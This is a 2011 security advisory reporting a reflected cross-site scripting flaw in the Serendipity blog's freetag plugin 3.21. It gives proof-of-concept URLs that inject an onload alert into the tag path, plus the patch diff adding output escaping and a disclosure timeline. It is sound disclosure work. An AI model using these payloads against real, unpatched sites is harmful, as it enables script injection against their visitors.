Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"



Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -

==========================
Vulnerability Description:
==========================

This is Cross-Site Scripting vulnerability

==================
Technical Details:
==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>

=========
Solution:
=========

Update to the latest version 3.22

diff serendipity_event_freetag.php

< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
<?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $

< $propbag->add('version', '3.21');
$propbag->add('version', '3.22');

< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
$serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));

====================
Disclosure Timeline:
====================

30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html



Relevant Pages

  • [NT] ActiveSync Denial of Service Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... By "pretending" to be an iPAQ and connecting to TCP port 5679, ... sending a corrupted "I would like to sync with you" packet, ... Sample code to demonstrate the vulnerability is shown below: ...
    (Securiteam)
  • [Full-disclosure] Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC
    ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
    (Full-Disclosure)
  • Re: MS09-032 Installation
    ... Security Advisory 953839, Microsoft Security Advisory 956391, Microsoft ... Vulnerability - CVE-2008-0015, as does the FixIt some had used before ... be a mistake to "undo" the workaround, ... What would happen if I install this update and then undo the ...
    (microsoft.public.security)
  • Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC Consult SA-200812
    ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
    (Bugtraq)
  • WSPortal version 1.0 Path Disclosure Vulnerability
    ... WSPortal version 1.0 Path Disclosure Vulnerability ... WSPortal is a site management system coded in PHP/MySQL. ... There is no official fix at the release of this Security Advisory. ...
    (Bugtraq)